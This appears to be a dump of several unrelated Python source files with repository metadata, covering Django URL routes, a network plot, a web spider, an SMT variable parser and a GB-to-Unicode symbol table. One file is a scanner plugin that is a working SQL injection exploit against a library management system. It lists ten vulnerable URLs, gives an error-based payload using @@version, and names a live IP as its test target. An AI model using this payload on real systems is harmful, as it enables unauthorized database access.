] | null | null | null | app/users/urls.py | ManojKumarMRK/recipe-app-api | f518e91fc335c46eb1034d865256c94bb3e56b32 | [
"MIT"
] | null | null | null | from django.urls import path
from users import views
app_name = 'users'
urlpatterns = [
path('create/',views.CreateUserView.as_view(),name='create'),
path('token/',views.CreateTokenView.as_view(),name='token'),
path('me/', views.ManageUserView.as_view(),name='me'),
] | 26.545455 | 66 | 0.674658 |
c92510f03e8c86ab8acb7443fa38d2785d4a3bca | 4,200 | py | Python | archive/visualization/network.py | ajrichards/bayesian-examples | fbd87c6f1613ea516408e9ebc3c9eff1248246e4 | [
"BSD-3-Clause"
] | 2 | 2016-01-27T08:51:23.000Z | 2017-04-17T02:21:34.000Z | archive/visualization/network.py | ajrichards/notebook | fbd87c6f1613ea516408e9ebc3c9eff1248246e4 | [
"BSD-3-Clause"
] | null | null | null | archive/visualization/network.py | ajrichards/notebook | fbd87c6f1613ea516408e9ebc3c9eff1248246e4 | [
"BSD-3-Clause"
] | null | null | null | import matplotlib as mpl
import matplotlib.pyplot as plt
import networkx as nx
import pandas as pd
def get_a_dict(filepath):
df = pd.read_csv(filepath).iloc[:, 1:13]
theme_dict = {}
interesting_theme_idx = [3, 6, 11, 15, 16]
theme_names = ['Horrendous IVR', 'Mobile Disengagement', "Couldn't Find it Online", "Mobile Users", "Just Show Me the Summary"]
counter = 0
for row_num in interesting_theme_idx:
theme_dict[theme_names[counter]] = [df.iloc[row_num, ::2], df.iloc[row_num, 1::2]]
counter += 1
return theme_dict
def draw_graph(edgeWeights,plotName='network_graph.png'):
"""
INPUT: this function takes in a dictionary of each edge names and the weight corresponding to that edge name
"""
edgeDict = {"t1e1":("T1","E1"), "t1e2":("T1","E2"), "t1e6":("T1","E6"), "t2e4":("T2","E4"), "t2e5":("T2","E5"), "t2e6":("T2","E6"), "t3e3":("T3","E3"), "t3e4":("T3","E4"), "t3e5":("T3","E5")}
## initialize the graph
G = nx.Graph()
for node in ["T1","T2","T3","E1","E2","E3","E4", "E5", "E6"]:
G.add_node(node)
for edgeName,edge in edgeDict.iteritems():
G.add_edge(edge[0],edge[1],weight=edgeWeights[edgeName])
# explicitly set positions
pos={"T1":(2,2),
"T2":(3.5,2),
"T3":(5,2),
"E1":(1,1),
"E2":(2,1),
"E3":(3,1),
"E4":(4,1),
"E5": (5, 1),
"E6": (6, 1)}
## get insignificant edges
isEdges = [(u,v) for (u,v,d) in G.edges(data=True) if d['weight'] ==0.0]
# plot the network
nodeSize = 2000
colors = [edge[2]['weight'] for edge in G.edges_iter(data=True)]
cmap = plt.cm.winter
fig = plt.figure(figsize=(12,6))
fig.suptitle('Word Theme Probabilities', fontsize=14, fontweight='bold')
ax = fig.add_axes([0.355, 0.0, 0.7, 1.0])
nx.draw(G,pos,node_size=nodeSize,edge_color=colors,width=4,edge_cmap=cmap,edge_vmin=-0.5,edge_vmax=0.5,ax=ax, with_labels=True)
nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["T1","T2","T3"],node_color='#F2F2F2',with_labels=True)
nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["E1","E2","E3","E4", "E5", "E6"],node_color='#0066FF',with_labels=True)
nx.draw_networkx_edges(G,pos,edgelist=isEdges,width=1,edge_color='k',style='dashed')
## add a colormap
ax1 = fig.add_axes([0.03, 0.05, 0.35, 0.14])
norm = mpl.colors.Normalize(vmin=0.05, vmax=.2)
cb1 = mpl.colorbar.ColorbarBase(ax1,cmap=cmap,
norm=norm,
orientation='horizontal')
# add an axis for the legend
ax2 = fig.add_axes([0.03,0.25,0.35,0.65]) # l,b,w,h
ax2.set_yticks([])
ax2.set_xticks([])
ax2.set_frame_on(True)
fontSize = 10
ax2.text(0.1,0.9,r"$T1$ = Horrendous IVR" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.8,r"$T2$ = Mobile Disengagement" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.7,r"$T3$ = Mobile Users" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.6,r"$E1$ = agent.transfer->ivr.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.5,r"$E2$ = agent.assigned->call.transfer" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.4,r"$E3$ = sureswip.login->view.account.summary" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.3,r"$E4$ = mobile.exit->mobile.entry" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.2,r"$E5$ = mobile.exit->journey.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.1,r"$E6$ = ivr.entry->ivr.proactive.balance" ,color='k',fontsize=fontSize,ha="left", va="center")
plt.savefig(plotName)
if __name__ == "__main__":
filepath = '../word_transition_model/data/transitions_df.csv'
data_dict = get_a_dict(filepath)
summary = data_dict['Just Show Me the Summary']
summary_events = summary[0]
summary_scores = summary[1]
edge_weights = {"t1e1":0.14, "t1e2":0.13, "t1e6":0.12, "t2e4":0.05, "t2e5":0.16, "t2e6":0.0, "t3e3":0.3, "t3e4":0.1, "t3e5":0.04}
draw_graph(edge_weights)
| 44.680851 | 196 | 0.61381 |
c926f1cc84ef2be7db59c1ebc4dd4db9c3aeb3e1 | 332 | py | Python | accounting_app/accounting_app/doctype/gl_entry/gl_entry.py | imdadhussain/accounting_app | 0f4b54242d81953c0c3ece3fb098701e86ce0eaf | [
"MIT"
] | null | null | null | accounting_app/accounting_app/doctype/gl_entry/gl_entry.py | imdadhussain/accounting_app | 0f4b54242d81953c0c3ece3fb098701e86ce0eaf | [
"MIT"
] | null | null | null | accounting_app/accounting_app/doctype/gl_entry/gl_entry.py | imdadhussain/accounting_app | 0f4b54242d81953c0c3ece3fb098701e86ce0eaf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2021, BS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.utils.nestedset import get_descendants_of
from frappe.utils import flt
class GLEntry(Document):
pass
| 25.538462 | 53 | 0.789157 |
c926fbd01b5a51930f76ba3ff40785e357d452a6 | 574 | py | Python | main/migrations/0002_auto_20200314_1530.py | kwatog/jumuk | 6234bf18ea0bf1eeb4194ecce23af9b669d4a841 | [
"MIT"
] | null | null | null | main/migrations/0002_auto_20200314_1530.py | kwatog/jumuk | 6234bf18ea0bf1eeb4194ecce23af9b669d4a841 | [
"MIT"
] | 5 | 2020-03-13T09:48:40.000Z | 2021-09-22T18:42:22.000Z | main/migrations/0002_auto_20200314_1530.py | kwatog/jumuk | 6234bf18ea0bf1eeb4194ecce23af9b669d4a841 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-03-14 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='first_name',
field=models.CharField(blank=True, max_length=32, null=True),
),
migrations.AlterField(
model_name='user',
name='last_name',
field=models.CharField(blank=True, max_length=32, null=True),
),
]
| 23.916667 | 73 | 0.578397 |
c92cee00e5a3f53b6fcf563376119be5a8fa6b38 | 645 | py | Python | fusion/dataset/mnist_svhn/transforms.py | Mrinal18/fusion | 34e563f2e50139385577c3880c5de11f8a73f220 | [
"BSD-3-Clause"
] | 14 | 2021-04-05T01:25:12.000Z | 2022-02-17T19:44:28.000Z | fusion/dataset/mnist_svhn/transforms.py | Mrinal18/fusion | 34e563f2e50139385577c3880c5de11f8a73f220 | [
"BSD-3-Clause"
] | 1 | 2021-07-05T08:32:49.000Z | 2021-07-05T12:34:57.000Z | fusion/dataset/mnist_svhn/transforms.py | Mrinal18/fusion | 34e563f2e50139385577c3880c5de11f8a73f220 | [
"BSD-3-Clause"
] | 1 | 2022-02-01T21:56:11.000Z | 2022-02-01T21:56:11.000Z | from torch import Tensor
from torchvision import transforms
class SVHNTransform:
"""
"""
def __call__(self, x) -> Tensor:
"""
Make SVHN transform
Args:
x: Input tensor
Return:
Transform tensor
"""
x = transforms.ToTensor()(x)
return x
class MNISTTransform:
"""
"""
def __call__(self, x) -> Tensor:
"""
Make MNIST transform
Args:
x: Input tensor
Return:
Transform tensor
"""
x = transforms.Resize((32, 32))(x)
x = transforms.ToTensor()(x)
return x
| 17.916667 | 42 | 0.493023 |
c92dbb28d5fa5849ee22ef3b509bd866ce701e9e | 1,508 | py | Python | scripts/previousScripts-2015-12-25/getVariableInfo.py | mistryrakesh/SMTApproxMC | 7c97e10c46c66e52c4e8972259610953c3357695 | [
"MIT"
] | null | null | null | scripts/previousScripts-2015-12-25/getVariableInfo.py | mistryrakesh/SMTApproxMC | 7c97e10c46c66e52c4e8972259610953c3357695 | [
"MIT"
] | null | null | null | scripts/previousScripts-2015-12-25/getVariableInfo.py | mistryrakesh/SMTApproxMC | 7c97e10c46c66e52c4e8972259610953c3357695 | [
"MIT"
] | null | null | null | #!/home/rakeshmistry/bin/Python-3.4.3/bin/python3
# @author: rakesh mistry - 'inspire'
# @date: 2015-08-06
import sys
import re
import os
import math
# Function: parseSmt2File
def parseSmt2FileVariables(smt2File):
compiledVarPattern = re.compile("[ \t]*\(declare-fun")
varMap = {}
for line in smt2File:
if compiledVarPattern.search(line):
wordList = line.split()
varName = wordList[1]
varWidthStr = wordList[-1].rstrip(")")
if varWidthStr.isdigit():
varWidth = int(varWidthStr)
varMap[varName] = varWidth
return varMap
# Function: main
def main(argv):
# check for correct number of arguments
scriptName = os.path.basename(__file__)
if len(argv) < 3:
sys.stderr.write("Error: Invalid arguments.\n")
sys.stderr.write(" [Usage]: " + scriptName + " <input_SMT2_file> <output_file>\n")
sys.exit(1)
# open files
inputSMTFile = open(argv[1], "r")
finalOutputFile = open(argv[2], "w")
varMap = parseSmt2FileVariables(inputSMTFile)
maxBitwidth = max(varMap.values())
singleBitVars = 0
multiBitVars = 0
for key in varMap.keys():
if varMap[key] > 1:
multiBitVars += 1
else:
singleBitVars += 1
finalOutputFile.write(str(maxBitwidth) + ";" + str(len(varMap)) + ";" + str(multiBitVars) + ";" + str(singleBitVars))
finalOutputFile.close()
if __name__ == "__main__":
main(sys.argv)
| 25.133333 | 121 | 0.611406 |
c92faeda80f7623d46a23810d5c128754efcada2 | 9,880 | py | Python | simplified_scrapy/core/spider.py | yiyedata/simplified-scrapy | ccfdc686c53b2da3dac733892d4f184f6293f002 | [
"Apache-2.0"
] | 7 | 2019-08-11T10:31:03.000Z | 2021-03-08T10:07:52.000Z | simplified_scrapy/core/spider.py | yiyedata/simplified-scrapy | ccfdc686c53b2da3dac733892d4f184f6293f002 | [
"Apache-2.0"
] | 1 | 2020-12-29T02:30:18.000Z | 2021-01-25T02:49:37.000Z | simplified_scrapy/core/spider.py | yiyedata/simplified-scrapy | ccfdc686c53b2da3dac733892d4f184f6293f002 | [
"Apache-2.0"
] | 4 | 2019-10-22T02:14:35.000Z | 2021-05-13T07:01:56.000Z | #!/usr/bin/python
#coding=utf-8
import json, re, logging, time, io, os
import sys
from simplified_scrapy.core.config_helper import Configs
from simplified_scrapy.core.sqlite_cookiestore import SqliteCookieStore
from simplified_scrapy.core.request_helper import requestPost, requestGet, getResponseStr, extractHtml
from simplified_scrapy.core.utils import convertTime2Str, convertStr2Time, printInfo, absoluteUrl
from simplified_scrapy.core.regex_helper import *
from simplified_scrapy.core.sqlite_urlstore import SqliteUrlStore
from simplified_scrapy.core.sqlite_htmlstore import SqliteHtmlStore
from simplified_scrapy.core.obj_store import ObjStore
class Spider():
name = None
models = None
concurrencyPer1s = 1
use_cookie = True
use_ip = False # globle
version = "0.0.1"
request_timeout = None
allowed_domains = []
excepted_domains = []
custom_down = False # globle
useragent = None
proxyips = None
logged_in = False
login_data = None
refresh_urls = False
stop = False
encodings = {}
request_tm = False
save_html = True
def __init__(self, name=None):
try:
if name is not None:
self.name = name
elif not getattr(self, 'name', None):
raise ValueError("%s must have a name" % type(self).__name__)
if not hasattr(self, 'start_urls'):
self.start_urls = []
if not hasattr(self, 'url_store'):
self.url_store = SqliteUrlStore(self.name)
if not hasattr(self, 'html_store'):
self.html_store = SqliteHtmlStore(self.name)
if not hasattr(self, "obj_store"):
self.obj_store = ObjStore(self.name)
if not hasattr(self, "cookie_store"):
self.cookie_store = SqliteCookieStore()
if not self.refresh_urls:
self.url_store.saveUrl(self.start_urls, 0)
else:
self.url_store.resetUrls(self.start_urls)
self.listA = listA
self.listImg = listImg
self.getElementsByTag = getElementsByTag
self.getElementByID = getElementByID
self.getElementsByClass = getElementsByClass
self.getElementByTag = getElementByTag
self.getElementByClass = getElementByClass
self.getElement = getElement
self.getElements = getElements
self.getElementByAttr = getElementByAttr
self.getParent = getParent
self.getChildren = getChildren
self.getNexts = getNexts
self.getSection = getSection
self.removeHtml = removeHtml
self.trimHtml = trimHtml
self.removeScripts = removeScripts
self.tm = 0
self.absoluteUrl = absoluteUrl
except Exception as err:
self.log(err, logging.ERROR)
def log(self, msg, level=logging.DEBUG):
printInfo(msg)
logger = logging.getLogger()
logging.LoggerAdapter(logger, None).log(level, msg)
def login(self, obj=None):
if (not obj): obj = self.login_data
if (obj and obj.get('url')):
data = obj.get('data')
if (obj.get('method') == 'get'):
return requestGet(obj.get('url'), obj.get('headers'),
obj.get('useProxy'), self)
else:
return requestPost(obj.get('url'), data, obj.get('headers'),
obj.get('useProxy'), self)
else:
return False
def getCookie(self, url):
if (self.use_cookie and self.cookie_store):
return self.cookie_store.getCookie(url)
return None
def setCookie(self, url, cookie):
if (self.use_cookie and self.cookie_store and cookie):
self.cookie_store.setCookie(url, cookie)
def beforeRequest(self, url, request, extra=None):
cookie = self.getCookie(url)
if (cookie):
if sys.version_info.major == 2:
request.add_header('Cookie', cookie)
else:
request.add_header('Cookie', cookie)
return request
def afterResponse(self, response, url, error=False, extra=None):
html = getResponseStr(response, url, self, error)
if sys.version_info.major == 2:
cookie = response.info().getheaders('Set-Cookie')
else:
cookie = response.info().get('Set-Cookie')
self.setCookie(url, cookie)
return html
def renderUrl(self, url, callback):
printInfo('Need to implement method "renderUrl"')
def customDown(self, url):
printInfo('Need to implement method "customDown"')
def popHtml(self, state=0):
return self.html_store.popHtml(state)
def saveHtml(self, url, html):
if (html):
if self.save_html:
self.html_store.saveHtml(url, html)
else:
return self.extract(Dict(url), html, None, None)
def updateHtmlState(self, id, state):
self.html_store.updateState(id, state)
def downloadError(self, url, err=None):
printInfo('error url:', url, err)
self.url_store.updateState(url, 2)
def isPageUrl(self, url):
if (not url):
return False
if ("html.htm.jsp.asp.php".find(url[-4:].lower()) >= 0):
return True
if ('.jpg.png.gif.bmp.rar.zip.pdf.doc.xls.ppt.exe.avi.mp4'.find(
url[-4:].lower()) >= 0
or '.jpeg.xlsx.pptx.docx'.find(url[-5:].lower()) >= 0
or '.rm'.find(url[-3:].lower()) >= 0):
return False
return True
def urlFilter(self, url):
if (self.excepted_domains):
for d in self.excepted_domains:
if (url.find(d) > -1): return False
if (self.allowed_domains):
for d in self.allowed_domains:
if (url.find(d) > -1): return True
return False
return True
def _urlFilter(self, urls):
tmp = []
for url in urls:
u = url['url']
if u and self.urlFilter(u):
tmp.append(url)
return tmp
def saveData(self, data):
if (data):
if (not isinstance(data, list) and not isinstance(data, dict)):
objs = json.loads(data)
elif isinstance(data, dict):
objs = [data]
else:
objs = data
for obj in objs:
if (obj.get("Urls")):
self.saveUrl(obj.get("Urls"))
ds = obj.get("Data")
if (ds):
if isinstance(ds, list):
for d in ds:
self.saveObj(d)
else:
self.saveObj(ds)
def saveObj(self, data):
self.obj_store.saveObj(data)
def extract(self, url, html, models, modelNames):
if (not modelNames):
return False
else:
return extractHtml(url["url"], html, models, modelNames,
url.get("title"))
_downloadPageNum = 0
_startCountTs = time.time()
def checkConcurrency(self):
tmSpan = time.time() - self._startCountTs
if (self._downloadPageNum > (self.concurrencyPer1s * tmSpan)):
return False
self._startCountTs = time.time()
self._downloadPageNum = 0
return True
def popUrl(self):
if (self.checkConcurrency()):
url = self.url_store.popUrl()
if url: self._downloadPageNum = self._downloadPageNum + 1
return url
else:
return {}
return None
def urlCount(self):
return self.url_store.getCount()
def saveUrl(self, urls):
if not urls: return
if not isinstance(urls, list): urls = [urls]
u = urls[0]
if isinstance(u, str):
if u.startswith('http'):
urls = [{'url': url} for url in urls]
else:
logging.warn('Bad link data')
return
elif not u.get('url'):
if u.get('href'):
for url in urls:
url['url'] = url.get('href')
elif u.get('src'):
for url in urls:
url['url'] = url.get('src')
else:
logging.warn('Link data has no url attribute')
return
urls = self._urlFilter(urls)
self.url_store.saveUrl(urls)
def plan(self):
return []
def clearUrl(self):
self.url_store.clearUrl()
def resetUrlsTest(self):
self.url_store.resetUrls(self.start_urls)
def resetUrls(self, plan):
if (plan and len(plan) > 0):
for p in plan:
now = time.localtime()
hour = now[3]
minute = now[4]
if (p.get('hour')):
hour = p.get('hour')
if (p.get('minute')):
minute = p.get('minute')
planTime = time.strptime(
u"{}-{}-{} {}:{}:00".format(now[0], now[1], now[2], hour,
minute), "%Y-%m-%d %H:%M:%S")
configKey = u"plan_{}".format(self.name)
_lastResetTime = Configs().getValue(configKey)
if (now > planTime
and (not _lastResetTime
or float(_lastResetTime) < time.mktime(planTime))):
self.url_store.resetUrls(self.start_urls)
Configs().setValue(configKey, float(time.mktime(planTime)))
return True
return False
| 34.666667 | 102 | 0.542611 |
c92fe0a2d25d872fa12d88c6134dd6759ab24310 | 1,457 | py | Python | Bugscan_exploits-master/exp_list/exp-2469.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-2469.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-2469.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/evn python
#--coding:utf-8--*--
#Name:天睿电子图书管理系统系统10处注入打包 避免重复
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0120852/
#Author:xq17
def assign(service,arg):
if service=="tianrui_lib":
return True,arg
def audit(arg):
urls = [
arg + 'gl_tj_0.asp?id=1',
arg + 'gl_tuijian_1.asp',
arg + 'gl_tz_she.asp?zt=1&id=1',
arg + 'gl_us_shan.asp?id=1',
arg + 'gl_xiu.asp?id=1',
arg + 'mafen.asp?shuxing=1',
arg + 'ping_cha.asp?mingcheng=1',
arg + 'ping_hao.asp?mingcheng=1',
arg + 'pl_add.asp?id=1',
arg + 'search.asp?keywords=1&shuxing=1',
]
for url in urls:
url += '%20and%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)'
code, head, res, err, _ = curl.curl2(url)
if((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
url = arg + 'gl_tz_she.asp?zt=11%20WHERE%201=1%20AND%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)--'
code, head, res, err, _ = curl.curl2(url)
if ((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
if __name__ == '__main__':
from dummy import *
audit(assign('tianrui_lib','http://218.92.71.5:1085/trebook/')[1]) | 41.628571 | 154 | 0.587509 |
c93112ec790fae5b416d3ab6e0ee349a48489f55 | 49,239 | py | Python | FBDParser/charmaps/symbols.py | jonix6/fbdparser | 617a79bf9062092e4fa971bbd66da02cd9d45124 | [
"MIT"
] | 7 | 2021-03-15T08:43:56.000Z | 2022-01-09T11:56:43.000Z | FBDParser/charmaps/symbols.py | jonix6/fbdparser | 617a79bf9062092e4fa971bbd66da02cd9d45124 | [
"MIT"
] | null | null | null | FBDParser/charmaps/symbols.py | jonix6/fbdparser | 617a79bf9062092e4fa971bbd66da02cd9d45124 | [
"MIT"
] | 3 | 2021-09-07T09:40:16.000Z | 2022-01-11T10:32:23.000Z | # -*- coding: utf-8 -*-
def gb2unicode_simple(x):
a, b = (x & 0xFF00) >> 8, x & 0x00FF
if 0xAA <= a <= 0xAF and 0xA1 <= b <= 0xFE:
return 0xE000 + (a - 0xAA) * 0x5E + b - 0xA1
elif 0xA1 <= a <= 0xA7 and (0x40 <= b <= 0x7E or 0x80 <= b <= 0xA0):
return 0xE4C6 + (a - 0xA1) * 0x60 + (0x3F + b - 0x80 if b >= 0x80 else b - 0x40)
return ord(bytearray([a, b]).decode('gb18030'))
def _unichr(x):
if x <= 0xFFFF:
return x
# U+10000 ~ U+10FFFF
return bytearray([
0xF0 | (x >> 18 & 0x7), 0x80 | (x >> 12 & 0x3F),
0x80 | (x >> 6 & 0x3F), 0x80 | (x & 0x3F)]).decode('utf-8')
class UnicodeMap(dict):
def __str__(self):
return 'unicode map contains {0} symbols'.format(len(self))
def update(self, hashmap):
for a, b in filter(lambda x: x[0] != x[1], hashmap.items()):
if a != b:
self[gb2unicode_simple(a)] = _unichr(b)
"A库符号"
symbolsA = UnicodeMap()
_update = symbolsA.update
# Area A1
_update({
0xA140: 0xA140, # 带括弧的小写罗马数字1((ⅰ))
0xA141: 0xA141, # 带括弧的小写罗马数字2((ⅱ))
0xA142: 0xA142, # 带括弧的小写罗马数字3((ⅲ))
0xA143: 0xA143, # 带括弧的小写罗马数字4((ⅳ))
0xA144: 0xA144, # 带括弧的小写罗马数字5((ⅴ))
0xA145: 0xA145, # 带括弧的小写罗马数字6((ⅵ))
0xA146: 0xA146, # 带括弧的小写罗马数字7((ⅶ))
0xA147: 0xA147, # 带括弧的小写罗马数字8((ⅷ))
0xA148: 0xA148, # 带括弧的小写罗马数字9((ⅸ))
0xA149: 0xA149, # 带括弧的小写罗马数字10((ⅹ))
0xA14A: 0xA14A, # 带括弧的小写罗马数字11((ⅺ))
0xA14B: 0xA14B, # 带括弧的小写罗马数字12((ⅻ))
0xA14C: 0x003D, # 三分宽等号 = =
0xA14D: 0x2212, # 三分宽减号 = −
0xA14E: 0x2215, # 三分宽斜线(除号) = ∕
0xA14F: 0x1D7CE, # 𝟎
0xA150: 0x1D7CF, # 𝟏
0xA151: 0x1D7D0, # 𝟐
0xA152: 0x1D7D1, # 𝟑
0xA153: 0x1D7D2, # 𝟒
0xA154: 0x1D7D3, # 𝟓
0xA155: 0x1D7D4, # 𝟔
0xA156: 0x1D7D5, # 𝟕
0xA157: 0x1D7D6, # 𝟖
0xA158: 0x1D7D7, # 𝟗
0xA159: 0x2664, # ♤
0xA15A: 0x2667, # ♧
0xA15B: 0x00B6, # ¶
0xA15C: 0x26BE, # ⚾
0xA15D: 0x263E, # 上1/4月亮 = ☾
0xA15E: 0x263D, # 下1/4月亮 = ☽
0xA15F: 0x263A, # 笑脸 = ☺
0xA160: 0x1F31C, # 半脸 = 🌜
0xA161: 0x1F31B, # 半脸 = 🌛
0xA162: 0x3036, # 〶
0xA163: 0x2252, # 近似符等号 = ≒
0xA164: 0xA164, # 吨号(T + S)
0xA165: 0x002B, # 三分宽加号 = +
0xA166: 0x223C, # 三分宽减号 = ∼
0xA167: 0x00A9, # ©
0xA168: 0x24D2, # ⓒ
0xA169: 0x24B8, # Ⓒ
0xA16A: 0x00AE, # ®
0xA16B: 0x24C7, # Ⓡ
0xA16D: 0x203E, # 上横线 = ‾
0xA16E: 0x005F, # 下横线 = _
0xA16F: 0x25E2, # ◢
0xA170: 0x25E3, # ◣
0xA171: 0x25E5, # ◥
0xA172: 0x25E4, # ◤
0xA173: 0x256D, # ╭
0xA174: 0x256E, # ╮
0xA175: 0x2570, # ╰
0xA176: 0x256F, # ╯
0xA177: 0x2550, # 双横线 = ═
0xA178: 0x2551, # 双竖线 = ║
0xA179: 0x2223, # 分开、绝对值 = ∣
0xA17A: 0x2926, # ⤦
0xA17B: 0x2924, # ⤤
0xA17C: 0x2923, # ⤣
0xA17D: 0x293E, # ⤾
0xA17E: 0x293F, # ⤿
0xA180: 0x21E7, # ⇧
0xA181: 0x21E9, # ⇩
0xA182: 0xA182, # 数字阳框码0(□ + 0)
0xA183: 0xA183, # 数字阳框码1(□ + 1)
0xA184: 0xA184, # 数字阳框码2(□ + 2)
0xA185: 0xA185, # 数字阳框码3(□ + 3)
0xA186: 0xA186, # 数字阳框码4(□ + 4)
0xA187: 0xA187, # 数字阳框码5(□ + 5)
0xA188: 0xA188, # 数字阳框码6(□ + 6)
0xA189: 0xA189, # 数字阳框码7(□ + 7)
0xA18A: 0xA18A, # 数字阳框码8(□ + 8)
0xA18B: 0xA18B, # 数字阳框码9(□ + 9)
0xA18C: 0xA18C, # 数字阴框码0(0️⃣)
0xA18D: 0xA18D, # 数字阴框码1(1️⃣)
0xA18E: 0xA18E, # 数字阴框码2(2️⃣)
0xA18F: 0xA18F, # 数字阴框码3(3️⃣)
0xA190: 0xA190, # 数字阴框码4(4️⃣)
0xA191: 0xA191, # 数字阴框码5(5️⃣)
0xA192: 0xA192, # 数字阴框码6(6️⃣)
0xA193: 0xA193, # 数字阴框码7(7️⃣)
0xA194: 0xA194, # 数字阴框码8(8️⃣)
0xA195: 0xA195, # 数字阴框码9(9️⃣)
0xA196: 0x1F6AD, # 🚭
0xA197: 0x1F377, # 🍷
0xA198: 0x26A0, # ⚠
0xA199: 0x2620, # ☠
0xA19A: 0xA19A, # (🚫 + 🔥)
0xA19B: 0x2B4D, # ⭍
0xA19C: 0x21B7, # ↷
0xA19D: 0x293A, # ⤺
0xA19E: 0x2716, # ✖
0xA19F: 0x003F, # 问号 = ?
0xA1A0: 0x0021 # 外文感叹号 = !
})
# Area A2
_update({
0xA240: 0x231C, # ⌜
0xA241: 0x231F, # ⌟
0xA242: 0xA242, # (empty ⌜)
0xA243: 0xA243, # (empty ⌟)
0xA244: 0x231D, # ⌝
0xA245: 0x231E, # ⌞
0xA246: 0xA246, # (empty ⌝)
0xA247: 0xA247, # (empty ⌞)
0xA248: 0xFF1C, # <
0xA249: 0xFF1E, # >
0xA24A: 0x2AA1, # ⪡
0xA24B: 0x2AA2, # ⪢
0xA24C: 0xA24C, # (vertical ”)
0xA24D: 0xA24D, # (vertical “)
0xA24E: 0x201E, # „
0xA24F: 0xA24F, # 斜感叹号(italic !)
0xA250: 0xA250, # 斜问号(italic ?)
0xA251: 0xA76C, # ❬
0xA252: 0xA76D, # ❭
0xA253: 0xA253, # (reversed 「)
0xA254: 0xA254, # (reversed 」)
0xA255: 0xA255, # (reversed 『)
0xA256: 0xA256, # (reversed 』)
0xA257: 0x203C, # 双叹号 = ‼
0xA258: 0xA258, # 斜双叹号(italic ‼)
0xA259: 0x2047, # 双问号 = ⁇
0xA25A: 0xA25A, # 斜双问号(italic ⁇)
0xA25B: 0x2048, # 疑问感叹号 = ⁈
0xA25C: 0xA25C, # 斜疑问感叹号(italic ⁈)
0xA25D: 0x2049, # 感叹疑问号 = ⁉
0xA25E: 0xA25E, # 斜感叹疑问号(italic ⁉)
0xA25F: 0xA25F, # 竖排小数点(vertical .)
0xA260: 0x03D6, # 希腊文符号PI = ϖ
0xA261: 0x2116, # №
0xA262: 0x0142, # 多国外文:带笔画的小写字母l = ł
0xA263: 0x0131, # 多国外文:无点的小写字母I = ı
0xA264: 0x014B, # 多国外文:小写字母eng = ŋ
0xA265: 0x0327, # 下加符 = ̧
0xA266: 0x00BF, # 倒置问号 = ¿
0xA267: 0x00A1, # 倒置感叹号 = ¡
0xA268: 0x00D8, # 多国外文:带笔画的大写字母O = Ø
0xA269: 0x00F8, # 多国外文:带笔画的小写字母o = ø
0xA26A: 0x0087, # 二重剑标 = ‡
0xA26B: 0x0086, # 短剑标 = †
0xA26C: 0x014A, # 多国外文:大写字母ENG = Ŋ
0xA26D: 0xFB00, # 多国外文 = ff
0xA26E: 0xFB01, # 多国外文 = fi
0xA26F: 0xFB02, # 多国外文 = fl
0xA270: 0xFB03, # 多国外文 = ffi
0xA271: 0xFB04, # 多国外文 = ffl
0xA272: 0x0141, # 多国外文 = Ł
0xA273: 0x00C7, # 多国外文 = Ç
0xA274: 0x00C6, # 多国外文 = Æ
0xA275: 0x00E6, # 多国外文 = æ
0xA276: 0x008C, # 多国外文 = Œ
0xA277: 0x009C, # 多国外文 = œ
0xA278: 0x00DF, # 多国外文 = ß
0xA279: 0x0083, # 多国外文 = ƒ
0xA27A: 0x00E5, # 多国外文 = å
0xA27B: 0x00E2, # 多国外文 = â
0xA27C: 0x00E4, # 多国外文 = ä
0xA27D: 0x0101, # 多国外文 = ā
0xA27E: 0x00E1, # 多国外文 = á
0xA280: 0x01CE, # 多国外文 = ǎ
0xA281: 0x00E0, # 多国外文 = à
0xA282: 0x00E3, # 多国外文 = ã
0xA283: 0x00EB, # 多国外文 = ë
0xA284: 0x1EBD, # 多国外文 = ẽ
0xA285: 0x00EE, # 多国外文 = î
0xA286: 0x00EF, # 多国外文 = ï
0xA287: 0x00F5, # 多国外文 = õ
0xA288: 0x00F4, # 多国外文 = ô
0xA289: 0x00F6, # 多国外文 = ö
0xA28A: 0x00FB, # 多国外文 = û
0xA28B: 0x00F1, # 多国外文 = ñ
0xA28C: 0x009A, # 多国外文 = š
0xA28D: 0x015D, # 多国外文 = ŝ
0xA28E: 0x011D, # 多国外文 = ĝ
0xA28F: 0x00FF, # 多国外文 = ÿ
0xA290: 0x009E, # 多国外文 = ž
